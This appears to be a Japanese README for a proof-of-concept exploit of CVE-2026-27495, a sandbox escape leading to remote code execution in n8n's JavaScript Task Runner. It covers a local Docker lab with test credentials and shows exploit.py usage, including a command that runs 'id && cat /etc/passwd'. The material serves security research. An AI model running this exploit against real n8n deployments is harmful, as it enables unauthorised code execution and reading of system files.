
ホストレルムのオブジェクトリークを通じた n8n JavaScript Task Runner のサンドボックスエスケープ。
| CVE | CVE-2026-27495 |
| CVSS | 9.4 (緊急) |
| CWE | CWE-94 — コードインジェクション |
| 影響を受けるバージョン | n8n < 1.123.22 / 2.0.0–2.9.2 / 2.10.0 |
| 修正バージョン | 1.123.22 / 2.9.3 / 2.10.1 |
| 攻撃対象領域 | コードノード(認証済み、Task Runners 有効) |
docker compose up -d
n8n の起動まで約15秒待ってから、http://localhost:5678 を開き、オーナーアカウントを作成してください(メール: [email protected]、パスワード: TestPassword123!)。
pip install requests
サンドボックスエスケープのプローブ:
python3 exploit.py --probe
RCE — docker-compose.yml 内の NODE_FUNCTION_ALLOW_BUILTIN=* をコメントアウト解除し、再起動してください:
docker compose down && docker compose up -d
python3 exploit.py --cmd "id && cat /etc/passwd"
初回セットアップ(オーナーアカウントを自動的に作成):
python3 exploit.py --setup --probe
Options:
--url URL n8n base URL (default: http://localhost:5678)
--email EMAIL Login email (default: [email protected])
--password PASSWORD Login password
--cmd CMD OS command to execute (RCE)
--setup Create owner account (fresh instance)
--probe Probe sandbox escape only (no RCE, works with any config)
--proxy PROXY HTTP proxy (e.g. http://127.0.0.1:8080)
正規のセキュリティ研究および教育目的に限り使用してください。